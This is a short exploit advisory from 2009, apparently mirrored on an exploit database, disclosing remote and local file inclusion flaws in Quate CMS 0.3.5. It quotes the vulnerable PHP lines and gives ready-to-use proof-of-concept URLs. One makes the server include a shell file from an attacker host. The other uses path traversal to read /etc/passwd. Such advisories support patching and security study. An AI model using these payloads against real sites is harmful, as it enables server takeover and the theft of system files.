[ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ] ######################################################################## #Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability #Download Script : http://quate.net/quatecms #Dork : die("lamers attempt"); :P ######################################################################## # #Vuln RFI : ./QuateCMS_035/admin/includes/header.php (line 27) # <?php # if ($bypass_restrict != 1) { # require_once($secure_page_path. "includes/secure.php"); # } # ?> #PoC : http://[target]/[path]/admin/includes/header.php?secure_page_path=http://[attacker]/shell.txt??? # # ######################################################################### # #Vuln LFI : ./QuateCMS_035/admin/includes/footer.php (line 4) # <?PHP # if ($not_logged_in != 1) { # if (file_exists("includes/themes/" .$row_secure['account_theme']. "/footer.php")) { # require_once("themes/" .$row_secure['account_theme']. "/footer.php"); # ?> #PoC : http://[target]/[path]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../etc/passwd%00 # ######################################################################## ######################################################################## ####################[90r0nt4l0 und3r9r0nd c0mmun1ty]#################### ######################################################################## ######################################################################## [ Gorontalo / 2009 ]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论